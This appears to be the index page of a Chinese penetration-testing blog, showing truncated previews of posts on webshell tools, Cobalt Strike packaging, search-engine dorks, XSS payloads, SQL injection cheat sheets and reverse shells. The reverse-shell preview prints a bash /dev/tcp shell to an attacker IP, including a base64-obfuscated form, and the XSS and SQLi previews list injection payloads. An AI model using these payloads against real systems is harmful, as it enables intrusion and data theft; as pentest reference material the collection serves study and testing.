Mac M1 用户也能用上 Godzilla Behinder
Behinder12cd /Applications/Godzilla.app/Contents/app//Library/Java/JavaVirtualMachines/jdk15/Contents/Home/bin/java --module-path "/Applications/Behinder.app/Contents/app/lib" --add-modules=javafx.controls --add-modules=javafx.fxml --add-modules=javafx.base --add-modules=javafx.graphics --add-modules=javafx.web -Xdock:icon=/Applications/Behinder.app/Contents/app/app.icns -jar /Applications/Behinder.app/Contents/app/Behinder.jar /Applications/Behinder.app/Contents...
WakeOnLan_Python
preview attention1234chmod 777 wolcp wol /usr/bin/wolvi /usr/bin/wolwol / wol 1.1.1.1 / wol google.com 1234DestIp = "localhost"DestNatIp = "127.0.0.1"DestMacAddress = "B43E98F386A4"DestPort = 9 #!/usr/bin/python3 # _*_ coding: utf-8 _*_ import socket, binascii, os, sys, requests, re def banaer(): os.system("clear") print("\n\033[24;37;34m __ __ ____ \033[0m") print("\033[24;37;32m \ \/ / | _ \ __...
zsh 配置文件
1yum install zsh -y 1apt install zsh -y oh-my-zsh12sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"sh -c "$(wget https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh -O -)" zsh-syntax-highlighting1git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting zsh-autosuggestions1git clone https://github.com/zsh-users/zsh-autosuggestions.git $...
自签安全证书
GitHub: ssl-tools 💻About For a more secure network environment, self built Ca and self issued SSL certificate 为了更安全的网络环境 自建 CA 并自签发 SSL 证书 Remember to check Debug 记得查看 Debug 推荐 ssleye myssl sslchecker 在线生成根证书 🤓Preview 👍HelpThank you AndroidOL for your help ! 12./ssl_tools.sh 1.1.1.1 admin admin@admin.com./ssl_tools.sh admin@admin.com admin admin@admin.com 🗼DebugIt only supports Linux and runs perfectly in CentOS Mac os Windows XRSec has the right to modify and interpret this artic...
关于Mac app打包[二]
经过连续多日的艰苦奋斗,俺终于摸到了门 生成app 首先 创建一个文件夹 app 进入文件夹 把要用到的全部复制进去 接着运行命令 jpackage 生成 app (注意有$符号需要反斜杠) 1234567jpackage --name CobaltStrike --input . \--main-jar CobaltStrike.jar \--type dmg \--app-version "4.2" \--copyright "Xrsec" \--description "CobaltStrike with JDK and Chinese. Mac zulu-Jdk15 CobaltStrike 4.2" \--icon app.icns --java-options "-javaagent:\$APPDIR/CobaltStrikeCN.jar -Dfile.encoding=utf-8 -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseP...
Mac M1 实用技术方案
🧬Home-brew 升级3.0取消终端Rosetta🎁 首相找到终端app –> 显示简介 –> 取消Rosetta 重新安装Home-brew 🎁 重新启动终端app ->> 打开你的 Clash 复制终端 酸酸乳 123456789export https_proxy=http://127.0.0.1:7890 http_proxy=http://127.0.0.1:7890 all_proxy=socks5://127.0.0.1:7890# 卸载 homebrew/bin/bash -c "$(curl -fsSL https://cdn.jsdelivr.net/gh/Homebrew/install@master/uninstall.sh)"# 你也可以选这强制删掉homebrew# which brew# cd# sudo rm-rf homebrew/bin/bash -c "$(curl -fsSL https://cdn.jsdelivr.net/gh/Homebrew/install@mast...
搜索引擎信息收集
转载自 Norah C.IV Google是一款功能强大的搜索引擎,能够根据robots协议抓取互联网上几乎所有页面,其中包括大量账号密码等敏感信息。GHDB(Google Hacking Database)存放了大量敏感信息,Google Hacking是指利用Google等搜索引擎搜索信息来进行入侵的技术和行为,攻击者利用搜索引擎高级指令能够轻松获取指定的敏感信息。以下是利用GHDB结合搜索引擎高级指令进行敏感信息获取的对应表: 1、搜索特殊的文件后缀在此过程中,测试人员会对域进行如下内容的搜索: 搜索内容 说明 site:test.com inurl:jsp.bak 搜索站点中是否存在后缀为jsp.bak的文件,即某些jsp的备份文件 site:test.com filetype:sql 搜索站点中是否存在SQL脚本文件 site:test.com inurl:log 搜索站点中是否存在应用程序日志文件,如ftp日志、oracle日志等 site:test.com filetype:txt 查找站点中是否有包含敏感信息的txt文件 site:...
web渗透测试清单
转载自 Norah C.IV web漏洞检测表 编号 检查内容描述 1 收集web相关信息,开放端口信息,服务信息等 2 严禁增/删/改防火墙iptables,私自开通高危端口 3 检查Flash跨域策略文件crossdomain.xml是否合法 4 检查是否有CSRF漏洞,根据系统条件进行检测 5 信息泄露漏洞安全性检查(例如test.cgi、phpinfo.php、info.pho、.svn/entries、HTTP认证泄漏漏洞、管理后台泄漏漏洞、内网信息泄漏漏洞、错误详情信息泄漏等) 6 检查是否有XSS漏洞(不合法的参数不能在页面原样返回,特别是openid/openkey) 7 检查是否泄漏后台默认文件漏洞 8 检查Flash跨域策略文件的安全性。避免Flash注入javascript或者actionscript脚本在浏览器或者flash中执行跨站攻击 9 Cookie安全性检查 10 检查是否有跳转漏洞 11 检查是否有Header注入漏洞 12 检查是否有源代码泄漏漏洞或者...
HTTP请求码对照表
转载自 Norah C.IV Status Code状态码详解对照表 状态码 含义 100 客户端应当继续发送请求。这个临时响应是用来通知客户端它的部分请求已经被服务器接收,且仍未被拒绝。客户端应当继续发送请求的剩余部分,或者如果请求已经完成,忽略这个响应。服务器必须在请求完成后向客户端发送一个最终响应。 101 服务器已经理解了客户端的请求,并将通过Upgrade 消息头通知客户端采用不同的协议来完成这个请求。在发送完这个响应最后的空行后,服务器将会切换到在Upgrade 消息头中定义的那些协议。 只有在切换新的协议更有好处的时候才应该采取类似措施。例如,切换到新的HTTP 版本比旧版本更有优势,或者切换到一个实时且同步的协议以传送利用此类特性的资源。 102 由WebDAV(RFC 2518)扩展的状态码,代表处理将被继续执行。 200 请求已成功,请求所希望的响应头或数据体将随此响应返回。 201 请求已经被实现,而且有一个新的资源已经依据请求的需要而建立,且其 URI 已经随Location 头信息返回。假如需要的资源无法及时建立的话,应当...
XSS触发语句
转载自 Norah C.IV 一、标准语句1<script>alert(/XSS/)</script> 二、尝试大小写1<sCript>alert(1)</scRipt> 三、使用<img>标签123456789101、windows事件<img src="x" onerror=alert(1)><img src="1" onerror=eval("alert('xss')")>//图片加载错误时触发2、鼠标事件<img src=1 onmouseover="alert(1)">//鼠标指针移动到元素时触发<img src=1 onmouseout="alert(1)">//鼠标指针移出时触发 四、使用<a>标签12345671、使用href属性<a href="https://www.qq.com">qq...
UPnP协议
转载自 Norah C.IV更多:SSDP协议 SOAP协议 一、UPnP简介通用即插即用(英语:Universal Plug and Play,简称UPnP)是由“通用即插即用论坛”(UPnP™ Forum)推广的一套网络协议,主要用于设备的智能互联互通。 UPnP 可以当作是一个相对复杂的网络协议,毕竟它包含了很多其他的网络协议,如:ip(设备寻址)、tcp、udp(数据打包发送)、http(数据传递格式)等。 UPnP 可以扩展,也就是说还可以在启动加入其他的协议,比如:传递数据时,http协议再包一层json协议,或者数据传递使用xml协议来传递等等。 UPnP 之所以强大,很大一个原因是基于互联网,这样对等设备可以通过互联网自由交互,也就是说任何可以联网的设备都可以使用UPnP协议。 二、UPnP用法(1)寻址——Addressing因为基于互联网,需要满足基本的p2p协议,所以就必须要寻址,寻址的过程就是设备获取ip地址的过程,这个里面一般都使用DHCP(Dynamic Host Configuration Protocol,动态主机配置协议),即路由动态的分配一个没...
渗透工具和查询平台
转载自 Norah C.IV 在网络渗透中难免会用到一些查询网站、扫描工具等,我只是列出了一些我经常使用的工具和查询平台。 一个监控DNS查询记录和HTTP请求的平台,在SSRF、XXE、RFI、SQL注入等漏洞的测试中有用。http://ceye.io/ 网络空间搜索引擎shodan,https://www.shodan.io/ZoomEye,https://www.zoomeye.org/censys,https://censys.io/fofa,https://fofa.so/ md5哈希解密https://www.cmd5.com/https://www.somd5.com/ IP地址位置查询https://www.ipip.net/ip.html 子域名在线爆破https://phpinfo.me/domain/ 微步在线情报社区https://x.threatbook.cn/ 匿名临时邮箱http://www.yopmail.com/zh/ 查询您的信息是否在数据泄露事件中被泄露https://haveibeenpwned.com/https://monitor....
反弹shell的各种姿势
转载自 Norah C.IV转载自 Bypass 在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。本文所有姿势整理自网络,并基于同一个假设的前提下完成测试和验证。(假设:攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。) Linux 反弹shell姿势一:bash反弹12bash -i >& /dev/tcp/192.168.99.242/1234 0>&1base64版:bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'在线编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html ...
SQL手工注入总结
转载自 Norah C.IV转载自 乌雲安全 虽说目前互联网上已经有很多关于 sql 注入的神器了,但是在这个 WAF 横行的时代,手工注入往往在一些真实环境中会显得尤为重要。本文主要把以前学过的知识做个总结,不会有详细的知识解读,类似于查询手册的形式,便于以后的复习与查阅,文中内容可能会存在错误,望师傅们斧正! 0x01 Mysql 手工注入1.1 联合注入123?id=1' order by 4--+?id=0' union select 1,2,3,database()--+?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+?id=0' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="users"...
Web常见漏洞描述及修复建议
转载自 Norah C.IV转载自 我超怕的 1.SQL注入 漏洞描述 Web程序中对于用户提交的参数未做过滤直接拼接到SQL语句中执行,导致参数中的特殊字符破坏了SQL语句原有逻辑,攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。 修复建议 代码层最佳防御sql漏洞方案:使用预编译sql语句查询和绑定变量。 (1)使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 (2)对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 (3)确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 (4)数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 (5)网站每个数据层的...